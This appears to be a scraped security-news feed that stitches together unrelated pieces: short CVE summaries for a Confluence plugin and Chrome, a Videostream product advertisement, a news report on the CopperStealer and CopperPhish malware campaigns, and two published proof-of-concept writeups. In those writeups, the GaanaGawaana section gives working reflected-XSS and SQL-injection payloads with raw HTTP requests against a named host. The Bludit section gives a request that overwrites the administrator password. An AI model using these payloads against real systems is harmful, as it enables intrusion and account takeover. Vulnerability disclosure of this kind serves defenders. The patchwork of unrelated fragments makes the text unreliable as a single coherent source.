The MoroSystems EasyMind - Mind Maps plugin before 2.15.0 for Confluence allows persistent XSS when saving a Mind Map with the hyperlink parameter.

CVE-2023-30452: EasyMind - Mind Maps for Confluence - Version history

Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.

**Downloaded videos on your Chromecast. Instantly.****The easiest way to stream

videos MP4s MKVs AVIs WMVs MP3s

from your computer to Chromecast or AndroidTV.  
Control it all from Android or iOS.**

  

Brooklyn Nine Nine © 2013-2015 Fremulon, Dr. Goor Productions (PG)

play\_arrow

No setup. Seriously.  
**Just start watching.**

event\_seat

**Relax with Mobile Apps**

Play, pause, & seek from your couch with **free** Android and iOS remotes.

**Play MKVs, AVIs, MP4s, MP3s...**

Videostream supports over 400 video and audio codecs out of the box.  
This means you can **play almost any video on your Chromecast!**

**...with no setup**

There's no pesky library setup or servers to install.  
There's no accounts to create or codecs to download.  
**Just choose a video and ...no really, that's it!**  
Start watching any video on your Chromecast in seconds, Install the Desktop App now!

Frozen © 2013 Walt Disney Animation Studios (G)

Suits © 2011-2015 Universal Cable (TV-14)

**Playlists, Subtitles, & Rainbows,  
Premium is Awesome.**

done

**Playlists:** Binge watch your favourite shows using playlists in Chrome

done

**Subtitles:** Get extra settings to change subtitle size and color

done

**Notifications:** Notifications on Android when your downloads finish

done

**Love:** Support (and feed!) our team of 7 developers in Canada! <3

**Start watching downloads on your Chromecast!**

**"It's the perfect app to stream your media to your Chromecasts"**

"No fiddling about with extra services, just find the file you want and have it play in the big screen." - Gizmodo

**It transformed my Chromecast from a Netflix and YouTube machine to a watch-whatever-I-want-machine. Which is great!**

\- Shonda, Videostream User

**Let me start by saying that I recently bought the lifetime premium membership and I absolutely love Videostream. It is my favorite thing in the world after pizza and Coca-Cola.**

\- Aldo, Videostream Premium User

**I have a very large movie collection on a networked drive, and it never fails to load the movies, cast them, load subtitles, etc. It's a piece of technology and media genius, so thank you all.**

\- Eliza, Videostream User

**I just wanted to say how much I love Videostream. I use it almost every day. Now that I can select files right from my phone, it is a completely hassle free experience.**

\- Rezaan, Videostream User

**People love Videostream. Try it yourself for free!  
**

**7 developers in Canada eh!?**

Just bunch of Canucks coding for the love of perfect streaming video <3

**Frequently Asked Questions**

Got questions? We have answers (if your answer isn't below, email us!)

**Do you play \_\_\_ files? (MKV, MP4, AVI, WMV...)**

Yup!! Videostream supports over 400 audio and video codecs so with almost complete certainty, yes.

**How much does it cost?**

Nothing, zip, zilch, nada, Videostream is completely free! If you're enjoying Videostream and want some extra features like playlists, extra subtitle settings, night mode, autoplay, and more, then Videostream Premium is for you!

**I have slow internet, will Videostream work?**

You bet! Since you are streaming video from your computer directly to your Chromecast or AndroidTV, Videostream doesn't use any of your internet bandwidth! That means no extra usage on your bill, no slowed down traffic on other devices.

**How do I setup Videostream?**

It's super simple! Open Google Chrome and then install Videostream. If you have an iPhone or Android phone you can check out our remote controls on those apps stores too!

**Does Videostream have playlists?!**

Is maple syrup sweet?! You bet! Playlists let you binge watch movies, tv shows, and even listen to music on your Chromecast. You can even shuffle or repeat your playlist! Grab your playlists in Videostream Premium, download and upgrade in the Desktop or Android App today!

**What if I have another question?**

Email us at \[email protected\]! Our awesome support bro Andrew will be sure to email you back with answers to your questions, solutions to your problems, and a random selection of cat pictures and gifs!

**Come on, it's what you bought your Chromecast for!**

CVE-2023-25394: What you bought your Chromecast for.

Use after free in DevTools in Google Chrome prior to 113.0.5672.126 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2723

Inappropriate implementation in WebApp Installs in Google Chrome prior to 113.0.5672.126 allowed an attacker who convinced a user to install a malicious web app to bypass install dialog via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-2726

Use after free in Navigation in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-2721: Stable Channel Update for Desktop

Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2724

Use after free in Autofill UI in Google Chrome on Android prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2722

GaanaGawaana Music Platform PHP Script version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

    ## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflectedand SQLi Vulnerability## Author: nu11secur1ty## Date: 05.16.2023## Vendor: https://www.codester.com/## Software: https://www.codester.com/items/27270/gaanagawaana-music-platform-php-script## Reference XSS: https://portswigger.net/web-security/cross-site-scripting## Reference SQLi: https://portswigger.net/web-security/sql-injection## Description:XSS: The value of the q request parameter is copied into the HTMLdocument as text between TITLE tags. The payloadaw9rx</title><script>alert(1)</script>rg1m6 was submitted in the qparameter. This input was echoed unmodified in the application'sresponse.--------------------------------------------------------------------------------------------------------------------------------SQLi: The q parameter appears to be vulnerable to SQL injectionattacks. The payloads 70346811' or 7218=7218-- and 18028207' or8587=8593-- were each submitted in the q parameter. These two requestsresulted in different responses, indicating that the input is beingincorporated into a SQL query in an unsafe way.STATUS: CRITICAL Vulnerability[+]Exploit-XSS-test:```XSSGET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2Host: gaanagawaana.codesler.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+]Response-XSS-test:```HTTP/2 200 OKCache-Control: no-store, max-age=0, no-cacheDate: Tue, 16 May 2023 06:39:12 GMTContent-Type: text/html; charset=UTF-8Server: Apache<html><head><title>aw9rx</title><script>alert(1)</script>rg1m6's Song Download,Listen & Lyrics</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">```--------------------------------------------------------------------[+]Payload-SQLi:```SQLi---Parameter: q (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: q=-5722%' OR 2476=2476 AND 'nMde%'='nMde---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/codester/2023/GaanaGawaana-Music-Platform-PHP-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/gaanagawaana-10-xss-reflected-sqli-for.html)## Time spend:01:10:00

GaanaGawaana Music Platform PHP Script 1.0 Cross Site Scripting / SQL Injection

An issue in Bludit 4.0.0-rc-2 allows authenticated attackers to change the Administrator password and escalate privileges via a crafted request.

The already authenticated attacker can send a normal request to change his password and then he can use the same JSON object and the vulnerable API token KEY in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff.

    PUT /api/users/admin HTTP/1.1
    Host: 127.0.0.1:8000
    Content-Length: 138
    sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
    sec-ch-ua-platform: "Windows"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
    content-type: application/json
    Accept: */*
    Origin: http://127.0.0.1:8000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8000/admin/edit-user/pwned
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
    Connection: close
    
    {"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
    
    

HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: \*
Content-Type: application/json

{"status":"0","message":"User edited.","data":{"key":"admin"}}

CVE-2023-31572: CVE-nu11secur1ty/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2 at main · nu11secur1ty/CVE-nu11secur1ty

The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish.
Trend Micro is tracking the financially motivated group under the name Water Orthrus. The adversary is also assessed to be behind another campaign known as Scranos, which was detailed by Bitdefender in

Online Security / Malware

The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish.

Trend Micro is tracking the financially motivated group under the name **Water Orthrus**. The adversary is also assessed to be behind another campaign known as Scranos, which was detailed by Bitdefender in 2019.

Active since at least 2021, Water Orthrus has a track record of leveraging pay-per-install (PPI) networks to redirect victims landing on cracked software download sites to drop an information stealer codenamed CopperStealer.

Another campaign spotted in August 2022 entailed the use of CopperStealer to distribute Chromium-based web browser extensions that are capable of performing unauthorized transactions and transferring cryptocurrency from victims' wallets to ones under attackers' control.

The latest attack sequences documented by Trend Micro don't mark much of a deviation, propagating CopperStealth by packaging it as installers for free tools on Chinese software-sharing websites.

"CopperStealth's infection chain involves dropping and loading a rootkit, which later injects its payload into explorer.exe and another system process," security researchers Jaromir Horejsi and Joseph C Chen said in a technical report.

"These payloads are responsible for downloading and running additional tasks. The rootkit also blocks access to blocklisted registry keys and prevents certain executables and drivers from running."

The driver denylist contains byte sequences pertaining to Chinese security software companies like Huorong, Kingsoft, and Qihoo 360.

CopperStealth also incorporates a task module that enables it to call out to a remote server and retrieve the command to be executed on the infected machine, equipping the malware to drop more payloads.

**File Sharing Websites Act as Conduit for CopperPhish Phishing Kit**

The CopperPhish campaign, detected worldwide in April 2023, takes advantage of an analogous process to deploy the malware via PPI networks behind free anonymous file-sharing websites.

"Visitors will be redirected to a download page designed by the PPI network after clicking on its advertisements, which pretended to be a download link," the researchers said. "The downloaded file is PrivateLoader, which downloads and runs many different malware."

The downloader service, which is also offered on a PPI basis, is then used to retrieve and launch CopperPhish, a phishing kit that's responsible for harvesting credit card information.

It achieves this by "starting a rundll32 process and injecting a simple program with a browser window (written in Visual Basic) in it," which loads a phishing page urging victims to scan a QR code in order to verify their identity and enter a confirmation code to "restore your device's network."

"The window has no controls that can be used to minimize or close it," the researchers explained. "The victim could close the browser's process in Task Manager or Process Explorer, but they would also need to terminate the main payload process, otherwise the browser process will happen again due to the persistence thread."

Once the sensitive details are entered in the page, the CopperPhish malware displays the message "the identity verification has passed" alongside a confirmation code that the victim can enter on the aforementioned screen.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

Providing the correct confirmation code also causes the malware to uninstall itself and delete all the dropped phishing files from the machine.

"The credential verification and confirmation code are two useful features that make this phishing kit more successful, as the victim cannot simply close the window or enter fake information just to get rid of the window," the researchers said.

The attribution to Water Orthrus is based on the fact that both CopperStealth and CopperPhish share similar source code characteristics as that of CopperStealer, raising the possibility that all three strains may have been developed by the same author.

The disparate objectives of the campaigns represent the evolution of the threat actor's tactics, indicating an attempt to add new capabilities to its arsenal and expand its financial horizons.

The findings come as malicious Google ads are being used to entice users into downloading fake installers for AI tools like Midjourney and OpenAI's ChatGPT that ultimately drop stealers such as Vidar and RedLine.

They also follow the discovery of a new traffic-monetizing service called TrafficStealer that leverages misconfigurations containers to redirect traffic to websites and generate fake ad clicks as part of an illicit money-making scheme.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#chrome